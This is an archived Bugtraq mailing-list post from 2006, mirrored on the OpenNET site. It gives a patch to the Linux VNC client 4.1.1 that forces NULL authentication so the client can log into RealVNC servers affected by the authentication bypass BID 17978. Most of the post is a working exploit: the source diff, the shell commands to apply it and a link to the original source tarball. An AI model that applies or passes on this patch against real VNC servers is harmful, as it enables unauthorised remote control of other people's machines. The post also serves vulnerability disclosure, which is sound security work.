The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Linux VNC evil client patch - BID 17978


<< Previous INDEX Search src / Print Next >>
Date: 23 Jun 2006 15:33:09 -0000
From: embyte@madlab.it
To: bugtraq@securityfocus.com
Subject: Linux VNC evil client patch - BID 17978
X-Virus-Scanned: antivirus-gw at tyumen.ru

Hi all,
I have done a patch to current Linux VNC client (ver. 4.1.1), which permit to authenticate to a bugged server with a NULL session, although password authentication is required 
(RealVNC Remote Authentication Bypass Vulnerability, BID 17978).

Here is the patch for file CConnection.cxx
$ cat vnc4-4.1.1+X4.3.0-NULL-Auth.patch
184,185c184,185
<     // Inform the server of our decision
<     if (secType != secTypeInvalid) {
---
>     // Send to server NULL Auth [0x01] 
>     if (secType=0x01) {

Apply with
$ patch < vnc4-4.1.1+X4.3.0-NULL-Auth.patch
File to patch: vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx
patching file vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx

The original tarball is named vnc4_4.1.1+X4.3.0.orig.tar.gz:
http://ftp.debian.org/debian/pool/main/v/vnc4/vnc4_4.1.1+X4.3.0.orig.tar.gz

Have a nice day
embyte


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру